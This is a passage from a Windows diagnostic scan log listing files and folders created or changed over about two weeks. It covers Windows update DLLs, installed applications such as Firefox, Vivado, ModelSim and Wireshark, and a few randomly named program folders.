2019-07-04 19:26 - 000087040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dot3msm.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 000087040 _____ (Microsoft Corporation) C:\WINDOWS\system32\EditBufferTestHook.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 000077824 _____ (Microsoft Corporation) C:\WINDOWS\system32\CustomInstallExec.exe 2019-07-04 19:26 - 2019-07-04 19:26 - 000076288 _____ (Microsoft Corporation) C:\WINDOWS\system32\autopilot.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 000072704 _____ (Microsoft Corporation) C:\WINDOWS\system32\efsext.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 000071720 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32appinventorycsp.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 000070656 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Management.EnrollmentStatusTracking.ConfigProvider.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 000066560 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\EditBufferTestHook.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 000065064 _____ (Microsoft Corporation) C:\WINDOWS\system32\WindowsManagementServiceWinRt.ProxyStub.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 000064512 _____ (Microsoft Corporation) C:\WINDOWS\system32\pcadm.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 000060928 _____ (Microsoft Corporation) C:\WINDOWS\system32\mf3216.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 000060416 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mssprxy.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 000060416 _____ (Microsoft Corporation) C:\WINDOWS\system32\msscntrs.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 000057856 _____ (Microsoft Corporation) C:\WINDOWS\system32\wups2.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 000055296 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\efsext.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 000051200 _____ (Microsoft Corporation) C:\WINDOWS\system32\pcalua.exe 2019-07-04 19:26 - 2019-07-04 19:26 - 000047000 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuauclt.exe 2019-07-04 19:26 - 2019-07-04 19:26 - 000046080 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msscntrs.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 000045568 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mf3216.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 000043008 _____ (Microsoft Corporation) C:\WINDOWS\system32\WiredNetworkCSP.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 000043008 _____ (Microsoft Corporation) C:\WINDOWS\system32\UpgradeResultsUI.exe 2019-07-04 19:26 - 2019-07-04 19:26 - 000041472 _____ (Microsoft Corporation) C:\WINDOWS\system32\WordBreakers.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 000041472 _____ (Microsoft Corporation) C:\WINDOWS\system32\wfdprov.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 000040960 _____ (Microsoft Corporation) C:\WINDOWS\system32\WiFiConfigSP.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 000036864 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlansvcpal.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 000036152 _____ (Microsoft Corporation) C:\WINDOWS\system32\DeviceCensus.exe 2019-07-04 19:26 - 2019-07-04 19:26 - 000034816 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mskssrv.sys 2019-07-04 19:26 - 2019-07-04 19:26 - 000033280 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WordBreakers.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 000030720 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\KNetPwrDepBroker.sys 2019-07-04 19:26 - 2019-07-04 19:26 - 000025088 _____ (Microsoft Corporation) C:\WINDOWS\system32\autopilotdiag.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 000017920 _____ (Microsoft Corporation) C:\WINDOWS\system32\bindflt.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 000016896 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlanhlp.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 000012800 _____ (Microsoft Corporation) C:\WINDOWS\system32\pcaevts.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 000012288 _____ (Microsoft Corporation) C:\WINDOWS\system32\pacjsworker.exe 2019-07-04 19:26 - 2019-07-04 19:26 - 000003584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TpmCertResources.dll 2019-07-04 19:26 - 2019-07-04 19:26 - 000003584 _____ (Microsoft Corporation) C:\WINDOWS\system32\TpmCertResources.dll 2019-07-04 19:25 - 2019-07-04 19:25 - 003365376 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\xpsrchvw.exe 2019-07-04 19:25 - 2019-07-04 19:25 - 000531976 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\USBXHCI.SYS 2019-07-04 19:25 - 2019-07-04 19:25 - 000435000 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\pci.sys 2019-07-04 19:25 - 2019-07-04 19:25 - 000296976 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\sdbus.sys 2019-07-04 19:25 - 2019-07-04 19:25 - 000257536 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\usbaudio2.sys 2019-07-04 19:25 - 2019-07-04 19:25 - 000193848 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dumpsd.sys 2019-07-04 19:25 - 2019-07-04 19:25 - 000142136 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\vmbus.sys 2019-07-04 19:25 - 2019-07-04 19:25 - 000069632 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\monitor.sys 2019-07-04 19:25 - 2019-07-04 19:25 - 000028936 _____ (Microsoft Corporation) C:\WINDOWS\system32\vmbuspipe.dll 2019-07-04 19:17 - 2019-07-04 19:17 - 004470272 _____ (Microsoft Corporation) C:\WINDOWS\system32\xpsrchvw.exe 2019-07-04 19:17 - 2019-07-04 19:17 - 001359872 _____ (Microsoft Corporation) C:\WINDOWS\system32\WebManagement.exe 2019-07-04 19:17 - 2019-07-04 19:17 - 000960512 _____ (Microsoft Corporation) C:\WINDOWS\system32\wdp.dll 2019-07-04 19:17 - 2019-07-04 19:17 - 000903168 _____ (Microsoft Corporation) C:\WINDOWS\system32\XpsFilt.dll 2019-07-04 19:17 - 2019-07-04 19:17 - 000637952 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wdp.dll 2019-07-04 19:17 - 2019-07-04 19:17 - 000568320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\XpsFilt.dll 2019-07-04 19:17 - 2019-07-04 19:17 - 000516648 _____ (Microsoft Corporation) C:\WINDOWS\system32\MicrosoftWebDriver.exe 2019-07-04 19:17 - 2019-07-04 19:17 - 000393768 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MicrosoftWebDriver.exe 2019-07-04 19:17 - 2019-07-04 19:17 - 000296448 _____ (Microsoft Corporation) C:\WINDOWS\system32\PerceptionSimulationREST.dll 2019-07-04 19:17 - 2019-07-04 19:17 - 000290816 _____ (Microsoft Corporation) C:\WINDOWS\system32\SshdBroker.dll 2019-07-04 19:17 - 2019-07-04 19:17 - 000174080 _____ (Microsoft Corporation) C:\WINDOWS\system32\DeveloperToolsSvc.exe 2019-07-04 19:17 - 2019-07-04 19:17 - 000111616 _____ (Microsoft Corporation) C:\WINDOWS\system32\SshdPinAuthLsa.dll 2019-07-04 19:17 - 2019-07-04 19:17 - 000101888 _____ (Microsoft Corporation) C:\WINDOWS\system32\DeveloperSetupCSP.dll 2019-07-04 19:17 - 2019-07-04 19:17 - 000099840 _____ (Microsoft Corporation) C:\WINDOWS\system32\DevToolsLauncher.exe 2019-07-04 19:17 - 2019-07-04 19:17 - 000099328 _____ (Microsoft Corporation) C:\WINDOWS\system32\XPSSHHDR.dll 2019-07-04 19:17 - 2019-07-04 19:17 - 000094208 _____ (Microsoft Corporation) C:\WINDOWS\system32\debugregsvc.dll 2019-07-04 19:17 - 2019-07-04 19:17 - 000081408 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\XPSSHHDR.dll 2019-07-04 19:17 - 2019-07-04 19:17 - 000076060 _____ C:\WINDOWS\SysWOW64\xpsrchvw.xml 2019-07-04 19:17 - 2019-07-04 19:17 - 000076060 _____ C:\WINDOWS\system32\xpsrchvw.xml 2019-07-04 19:17 - 2019-07-04 19:17 - 000060416 _____ (Microsoft Corporation) C:\WINDOWS\system32\DeployUtil.exe 2019-07-04 19:17 - 2019-07-04 19:17 - 000032768 _____ (Microsoft Corporation) C:\WINDOWS\system32\debugregsvcapi.dll 2019-07-04 19:17 - 2019-07-04 19:17 - 000020480 _____ (Microsoft Corporation) C:\WINDOWS\system32\DeveloperTools.ProxyStub.dll 2019-07-04 19:17 - 2019-07-04 19:17 - 000000000 __RSD C:\WINDOWS\SysWOW64\WindowsDevicePortal 2019-07-04 19:17 - 2019-07-04 19:17 - 000000000 __RSD C:\WINDOWS\system32\WindowsDevicePortal 2019-07-04 19:17 - 2019-07-04 19:17 - 000000000 ___RD C:\WINDOWS\WebManagement 2019-07-04 18:48 - 2019-07-04 18:48 - 000008192 _____ C:\WINDOWS\system32\config\userdiff 2019-07-04 18:22 - 2019-07-04 21:09 - 000000000 ____D C:\Program Files (x86)\ZUFMPmTZdtsU2 2019-07-04 18:22 - 2019-07-04 21:09 - 000000000 ____D C:\Program Files (x86)\GxnrpAHsxxEDoptHbBR 2019-07-04 18:22 - 2019-07-04 19:09 - 000000000 ____D C:\Program Files (x86)\EUlvVIReVwBbC 2019-07-04 18:22 - 2019-07-04 18:22 - 000000000 ____D C:\ProgramData\XnuNNbyLBVswFYVB 2019-07-04 18:22 - 2019-07-04 18:22 - 000000000 ____D C:\Program Files (x86)\RiWpAbLxdIE 2019-07-04 18:21 - 2019-07-04 21:43 - 000000000 ____D C:\Program Files (x86)\ygrvQGaZTWUn 2019-07-04 18:21 - 2019-07-04 21:09 - 000000000 ____D C:\Program Files (x86)\HrhLJefZU 2019-07-04 18:00 - 2019-07-04 21:07 - 000000000 ___DC C:\WINDOWS\Panther 2019-07-04 13:04 - 2019-07-04 13:04 - 000000000 ____D C:\Users\virk_ps\Desktop\Chrome_backup 2019-07-04 13:03 - 2019-07-04 13:03 - 001240750 _____ C:\Users\virk_ps\Downloads\takeout-20190704T064017Z-001.zip 2019-07-04 07:15 - 2019-07-04 17:45 - 000000036 _____ C:\WINDOWS\progress.ini 2019-07-04 06:47 - 2019-07-04 21:06 - 000000000 ___HD C:\$GetCurrent 2019-07-04 06:47 - 2019-07-04 06:47 - 006254480 _____ (Microsoft Corporation) C:\Users\virk_ps\Downloads\Windows10Upgrade9252.exe 2019-07-04 06:33 - 2019-07-04 23:22 - 000000000 ____D C:\Users\virk_ps\AppData\LocalLow\Mozilla 2019-07-04 06:32 - 2019-07-04 06:33 - 000000000 ____D C:\Users\virk_ps\AppData\Roaming\Mozilla 2019-07-04 06:32 - 2019-07-04 06:33 - 000000000 ____D C:\ProgramData\Mozilla 2019-07-04 06:32 - 2019-07-04 06:32 - 000001012 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Firefox.lnk 2019-07-04 06:32 - 2019-07-04 06:32 - 000001000 _____ C:\Users\Public\Desktop\Firefox.lnk 2019-07-04 06:32 - 2019-07-04 06:32 - 000000000 ____D C:\Users\virk_ps\AppData\Local\Mozilla 2019-07-04 06:32 - 2019-07-04 06:32 - 000000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service 2019-07-04 06:31 - 2019-07-04 06:32 - 000000000 ____D C:\Program Files\Mozilla Firefox 2019-07-04 06:29 - 2019-07-04 06:29 - 000287560 _____ (Mozilla) C:\Users\virk_ps\Downloads\Firefox Installer.exe 2019-07-03 22:27 - 2019-07-03 22:27 - 000000384 _____ C:\Users\virk_ps\Downloads\Backup-codes-prabh.6593virk.txt 2019-07-03 18:14 - 2019-07-04 20:49 - 000002308 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk 2019-07-03 18:14 - 2019-07-04 20:49 - 000002267 _____ C:\Users\Public\Desktop\Google Chrome.lnk 2019-07-03 18:13 - 2019-07-03 18:14 - 000000000 ____D C:\Users\virk_ps\AppData\Local\Google 2019-07-03 18:13 - 2019-07-03 18:13 - 000000000 ____D C:\Program Files (x86)\Google 2019-07-03 16:31 - 2019-07-03 16:31 - 000000000 ____D C:\ProgramData\RegRun 2019-07-03 16:29 - 2019-07-03 16:46 - 000000000 ____D C:\Program Files (x86)\UnHackMe 2019-07-03 16:29 - 2019-07-03 16:41 - 000000000 ____D C:\Users\virk_ps\Documents\RegRun2 2019-07-03 16:29 - 2019-07-03 16:40 - 000000000 ____D C:\Users\Public\Documents\RegRunInfo 2019-07-03 16:29 - 2019-06-07 15:54 - 000000902 _____ C:\WINDOWS\system32\Drivers\etc\hosts.old 2019-07-03 16:08 - 2019-07-03 16:08 - 000000000 ____D C:\Users\virk_ps\AppData\Local\VS Revo Group 2019-07-03 16:08 - 2019-07-03 16:08 - 000000000 ____D C:\ProgramData\VS Revo Group 2019-07-03 16:06 - 2019-07-03 16:06 - 000000000 ____D C:\MATS 2019-07-03 13:38 - 2019-07-03 17:24 - 000000000 ___HD C:\WINDOWS\rss 2019-07-03 13:16 - 2019-07-03 13:16 - 001151544 _____ (Google LLC) C:\Users\virk_ps\Downloads\ChromeSetup.exe 2019-07-03 10:43 - 2019-07-03 10:43 - 000000000 ____D C:\ProgramData\TSRProSettings 2019-07-02 18:40 - 2019-07-03 09:45 - 000000000 ____D C:\Users\virk_ps\AppData\Roaming\Nitro 2019-07-02 18:40 - 2019-07-02 18:40 - 000002503 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Nitro Reader 5.lnk 2019-07-02 18:40 - 2019-07-02 18:40 - 000002041 _____ C:\Users\Public\Desktop\Nitro Reader.lnk 2019-07-02 18:40 - 2019-07-02 18:40 - 000000000 ____D C:\ProgramData\Nitro 2019-07-02 18:40 - 2019-07-02 18:40 - 000000000 ____D C:\Program Files\Nitro 2019-07-02 18:40 - 2019-07-02 18:40 - 000000000 ____D C:\Program Files\Common Files\Nitro 2019-07-02 18:40 - 2019-07-02 18:40 - 000000000 ____D C:\Program Files (x86)\Nitro 2019-07-02 18:40 - 2016-08-02 19:09 - 000031904 _____ (Nitro Software, Inc.) C:\WINDOWS\system32\nitrolocalmon10.dll 2019-07-02 18:40 - 2016-08-02 19:09 - 000020128 _____ (Nitro Software, Inc.) C:\WINDOWS\system32\nitrolocalui10.dll 2019-07-02 17:29 - 2019-07-02 17:29 - 000000000 ____D C:\Users\virk_ps\AppData\Roaming\LibreOffice 2019-07-02 17:28 - 2019-07-04 20:32 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\LibreOffice 6.2 2019-07-02 17:28 - 2019-07-02 17:28 - 000001181 _____ C:\Users\Public\Desktop\LibreOffice 6.2.lnk 2019-07-02 17:26 - 2019-07-02 17:27 - 000000000 ____D C:\Program Files\LibreOffice 2019-07-02 16:38 - 2019-07-02 16:38 - 000001947 _____ C:\Users\virk_ps\Desktop\SumatraPDF.lnk 2019-07-02 16:37 - 2019-07-02 16:49 - 000000000 ____D C:\Users\virk_ps\AppData\Roaming\SumatraPDF 2019-07-02 16:37 - 2019-07-02 16:37 - 000001947 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\SumatraPDF.lnk 2019-07-02 16:37 - 2019-07-02 16:37 - 000000000 ____D C:\Program Files\SumatraPDF 2019-07-02 12:43 - 2019-07-02 12:43 - 000000000 ____D C:\Users\virk_ps\Desktop\MAC_Insertion_block 2019-06-28 18:24 - 2019-06-28 18:27 - 000000000 ____D C:\flexlm 2019-06-28 17:54 - 2019-06-28 17:54 - 000000000 ____D C:\Users\virk_ps\AppData\Local\SafeNet Sentinel 2019-06-28 17:54 - 2019-06-28 17:54 - 000000000 ____D C:\ProgramData\SafeNet Sentinel 2019-06-28 17:53 - 2019-06-28 17:53 - 000001726 _____ C:\Users\virk_ps\Desktop\ModelSim SE-64 10.5.lnk 2019-06-28 17:47 - 2019-07-01 15:26 - 000000000 ____D C:\modeltech64_10.5 2019-06-28 17:46 - 2019-07-04 20:32 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mentor Graphics 2019-06-28 16:40 - 2014-11-27 10:04 - 004608320 _____ (SafeNet Inc.) C:\WINDOWS\system32\hasplms.exe 2019-06-28 16:40 - 2014-11-27 10:04 - 004608320 _____ (SafeNet Inc.) C:\WINDOWS\system32\aksllmtp.exe 2019-06-28 16:40 - 2014-11-27 10:04 - 000331608 _____ (SafeNet Inc.) C:\WINDOWS\system32\Drivers\hardlock.sys 2019-06-28 16:40 - 2014-11-27 10:04 - 000198088 _____ (Aladdin Knowledge Systems Ltd.) C:\WINDOWS\SysWOW64\hlvdd.dll 2019-06-28 16:40 - 2014-11-27 10:04 - 000162136 _____ (SafeNet Inc.) C:\WINDOWS\system32\Drivers\aksfridge.sys 2019-06-28 16:40 - 2014-11-27 10:04 - 000091784 _____ (SafeNet Inc.) C:\WINDOWS\system32\Drivers\aksdf.sys 2019-06-28 16:36 - 2019-07-04 20:32 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ModelSim SE-64 10.5 2019-06-28 16:30 - 2019-06-28 17:46 - 000000000 ____D C:\MentorGraphics 2019-06-27 17:05 - 2019-07-01 15:26 - 000000000 ____D C:\Users\virk_ps\MAC_Extractor_Block 2019-06-25 10:13 - 2019-06-25 13:22 - 000000000 ____D C:\Users\virk_ps\Documents\XilinxDocs 2019-06-25 10:03 - 2019-06-25 10:03 - 000000000 _____ C:\Users\virk_ps\Documents\proxy.txt 2019-06-24 22:57 - 2019-06-24 23:29 - 000000000 ____D C:\Users\virk_ps\.vivado_hls 2019-06-24 22:57 - 2019-06-24 22:57 - 000000000 ____D C:\Users\virk_ps\.mozilla 2019-06-24 22:29 - 2019-06-24 22:29 - 000000000 ____D C:\Users\virk_ps\AppData\Local\Xilinx 2019-06-24 21:55 - 2019-06-24 21:55 - 000000000 ____D C:\ProgramData\WIFIService 2019-06-24 21:54 - 2019-07-04 23:01 - 000000004 _____ C:\ProgramData\lock.dat 2019-06-24 21:54 - 2019-07-04 22:03 - 000000112 _____ C:\ProgramData\irw.atsd 2019-06-24 21:54 - 2019-06-24 21:54 - 000000008 _____ C:\ProgramData\ts.dat 2019-06-24 21:49 - 2019-06-24 21:49 - 000000080 ___SH C:\bootTel.dat 2019-06-24 21:15 - 2019-07-02 10:10 - 000000000 ____D C:\ProgramData\boost_interprocess 2019-06-24 20:48 - 2019-06-24 20:48 - 000000000 ____D C:\Users\virk_ps\AppData\Roaming\prunld1171 2019-06-24 20:28 - 2019-06-24 20:29 - 000000000 ____D C:\ProgramData\FLEXnet 2019-06-24 20:28 - 2019-06-24 20:28 - 000000000 ____D C:\Program Files\Common Files\Macrovision Shared 2019-06-24 20:23 - 2019-06-24 20:23 - 000000843 _____ C:\Users\Public\Desktop\Vivado 2016.4.lnk 2019-06-24 20:23 - 2019-06-24 20:23 - 000000671 _____ C:\Users\Public\Desktop\Vivado HLS 2016.4.lnk 2019-06-24 20:23 - 2019-06-24 20:23 - 000000611 _____ C:\Users\Public\Desktop\System Generator 2016.4.lnk 2019-06-24 20:23 - 2019-06-24 20:23 - 000000419 _____ C:\Users\Public\Desktop\DocNav.lnk 2019-06-24 14:11 - 2019-06-24 14:12 - 000000000 ____D C:\Users\virk_ps\.chipscope 2019-06-20 17:15 - 2019-07-04 20:32 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Core Temp 2019-06-20 17:15 - 2019-06-20 17:15 - 000000996 _____ C:\Users\virk_ps\Desktop\Core Temp.lnk 2019-06-20 17:15 - 2019-06-20 17:15 - 000000000 ____D C:\Program Files\Core Temp 2019-06-20 16:52 - 2019-06-20 16:52 - 000001834 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Wireshark.lnk 2019-06-20 16:52 - 2019-06-20 16:52 - 000001822 _____ C:\Users\Public\Desktop\Wireshark.lnk 2019-06-20 16:50 - 2019-07-04 21:06 - 000000000 ____D C:\Program Files\Npcap 2019-06-20 16:50 - 2019-07-04 20:32 - 000000000 ____D C:\WINDOWS\SysWOW64\Npcap 2019-06-20 16:50 - 2019-07-04 20:32 - 000000000 ____D C:\WINDOWS\system32\Npcap 2019-06-20 16:43 - 2019-07-03 09:32 - 000000335 _____ C:\Users\virk_ps\Desktop\computer.lnk 2019-06-20 15:20 - 2019-06-20 15:20 - 000000000 ____D C:\Users\virk_ps\AppData\Local\DesignSoft 2019-06-20 15:15 - 2019-06-20 15:15 - 000000000 ____D C:\Users\virk_ps\Documents\OrcadLibraryBuilder 2019-06-18 10:34 - 2019-07-04 20:32 - 000000000 ____D C:\Program Files\UNP 2019-06-12 07:12 - 2019-03-19 10:16 - 000035353 _____ C:\WINDOWS\Education.xml 2019-06-12 07:10 - 2019-03-19 10:16 - 000034885 _____ C:\WINDOWS\ProfessionalWorkstation.xml 2019-06-12 07:08 - 2019-03-19 10:16 - 000034885 _____ C:\WINDOWS\ProfessionalEducation.xml 2019-06-12 07:01 - 2019-06-12 07:01 - 008010240 _____ (Microsoft Corporation) C:\WINDOWS\system32\mstscax.dll 2019-06-12 07:01 - 2019-06-12 07:01 - 007802224 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.dll 2019-06-12 07:01 - 2019-06-12 07:01 - 007006720 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mstscax.dll 2019-06-12 07:01 - 2019-06-12 07:01 - 005083352 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.dll 2019-06-12 07:01 - 2019-06-12 07:01 - 005014016 _____ (Microsoft Corporation) C:\WINDOWS\system32\MFMediaEngine.dll 2019-06-12 07:01 - 2019-06-12 07:01 - 003837440 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9.dll 2019-06-12 07:01 - 2019-06-12 07:01 - 003635200 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MFMediaEngine.dll 2019-06-12 07:01 - 2019-06-12 07:01 - 002314440 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msmpeg2vdec.dll 2019-06-12 07:01 - 2019-06-12 07:01 - 001510960 _____ (Microsoft Corporation) C:\WINDOWS\system32\msvproc.dll 2019-06-12 07:01 - 2019-06-12 07:01 - 001493944 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfsvr.dll 2019-06-12 07:01 - 2019-06-12 07:01 - 001311744 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msjet40.dll 2019-06-12 07:01 - 2019-06-12 07:01 - 001271808 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdpcore.dll 2019-06-12 07:01 - 2019-06-12 07:01 - 001248256 _____ (Microsoft Corporation) C:\WINDOWS\system32\WMSPDMOE.DLL 2019-06-12 07:01 - 2019-06-12 07:01 - 001244728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msvproc.dll 2019-06-12 07:01 - 2019-06-12 07:01 - 001105776 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfsvr.dll 2019-06-12 07:01 - 2019-06-12 07:01 - 001098712 _____ (Microsoft Corporation) C:\WINDOWS\system32\DolbyDecMFT.dll 2019-06-12 07:01 - 2019-06-12 07:01 - 001079296 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rdpcore.dll 2019-06-12 07:01 - 2019-06-12 07:01 - 001060352 _____ (Microsoft Corporation) C:\WINDOWS\system32\termsrv.dll 2019-06-12 07:01 - 2019-06-12 07:01 - 001039872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WMSPDMOE.DLL 2019-06-12 07:01 - 2019-06-12 07:01 - 000952416 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DolbyDecMFT.dll 2019-06-12 07:01 - 2019-06-12 07:01 - 000882688 _____ (Microsoft Corporation) C:\WINDOWS\system32\CPFilters.dll 2019-06-12 07:01 - 2019-06-12 07:01 - 000744248 _____ (Microsoft Corporation) C:\WINDOWS\system32\WMADMOE.DLL 2019-06-12 07:01 - 2019-06-12 07:01 - 000737552 _____ (Microsoft Corporation) C:\WINDOWS\system32\WMADMOD.DLL 2019-06-12 07:01 - 2019-06-12 07:01 - 000684544 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript.dll 2019-06-12 07:01 - 2019-06-12 07:01 - 000682744 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WMADMOE.DLL 2019-06-12 07:01 - 2019-06-12 07:01 - 000666280 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WMADMOD.DLL 2019-06-12 07:01 - 2019-06-12 07:01 - 000562176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9diag.dll 2019-06-12 07:01 - 2019-06-12 07:01 - 000551824 _____ (Microsoft Corporation) C:\WINDOWS\system32\MFPlay.dll 2019-06-12 07:01 - 2019-06-12 07:01 - 000537608 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mf.dll 2019-06-12 07:01 - 2019-06-12 07:01 - 000529408 _____ (Microsoft Corporation) C:\WINDOWS\system32\nltest.exe 2019-06-12 07:01 - 2019-06-12 07:01 - 000499200 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdpshell.exe 2019-06-12 07:01 - 2019-06-12 07:01 - 000463272 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MFPlay.dll 2019-06-12 07:01 - 2019-06-12 07:01 - 000429568 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\werui.dll 2019-06-12 07:01 - 2019-06-12 07:01 - 000422912 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdpencom.dll 2019-06-12 07:01 - 2019-06-12 07:01 - 000420360 _____ (Microsoft Corporation) C:\WINDOWS\system32\MSAudDecMFT.dll 2019-06-12 07:01 - 2019-06-12 07:01 - 000376320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mspbde40.dll 2019-06-12 07:01 - 2019-06-12 07:01 - 000353280 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rdpencom.dll 2019-06-12 07:01 - 2019-06-12 07:01 - 000353280 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msrd3x40.dll 2019-06-12 07:01 - 2019-06-12 07:01 - 000341504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msexcl40.dll 2019-06-12 07:01 - 2019-06-12 07:01 - 000261016 _____ (Microsoft Corporation) C:\WINDOWS\system32\ProximityUxHost.exe 2019-06-12 07:01 - 2019-06-12 07:01 - 000256000 _____ (Microsoft Corporation) C:\WINDOWS\system32\RdpRelayTransport.dll 2019-06-12 07:01 - 2019-06-12 07:01 - 000241152 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msltus40.dll 2019-06-12 07:01 - 2019-06-12 07:01 - 000186880 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DWWIN.EXE 2019-06-12 07:01 - 2019-06-12 07:01 - 000136720 _____ (Microsoft Corporation) C:\WINDOWS\system32\microsoft-windows-kernel-processor-power-events.dll 2019-06-12 07:00 - 2019-06-12 07:00 - 007831368 _____ (Microsoft Corporation) C:\WINDOWS\system32\OneCoreUAPCommonProxyStub.dll 2019-06-12 07:00 - 2019-06-12 07:00 - 007275008 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Data.Pdf.dll 2019-06-12 07:00 - 2019-06-12 07:00 - 007241800 _____ (Microsoft Corporation) C:\WINDOWS\system32\shell32.dll 2019-06-12 07:00 - 2019-06-12 07:00 - 006381568 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.dll 2019-06-12 07:00 - 2019-06-12 07:00 - 006036480 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.pcshell.dll 2019-06-12 07:00 - 2019-06-12 07:00 - 005939712 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Data.Pdf.dll 2019-06-12 07:00 - 2019-06-12 07:00 - 005745504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\shell32.dll 2019-06-12 07:00 - 2019-06-12 07:00 - 005071360 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinui.dll 2019-06-12 07:00 - 2019-06-12 07:00 - 005040640 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininet.dll 2019-06-12 07:00 - 2019-06-12 07:00 - 004867584 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9.dll 2019-06-12 07:00 - 2019-06-12 07:00 - 004537344 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wininet.dll 2019-06-12 07:00 - 2019-06-12 07:00 - 004034048 _____ (Microsoft Corporation) C:\WINDOWS\system32\SRH.dll 2019-06-12 07:00 - 2019-06-12 07:00 - 003947520 _____ (Microsoft Corporation) C:\WINDOWS\system32\tellib.dll 2019-06-12 07:00 - 2019-06-12 07:00 - 003771392 _____ (Microsoft Corporation) C:\WINDOWS\system32\diagtrack.dll 2019-06-12 07:00 - 2019-06-12 07:00 - 003734456 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\OneCoreUAPCommonProxyStub.dll 2019-06-12 07:00 - 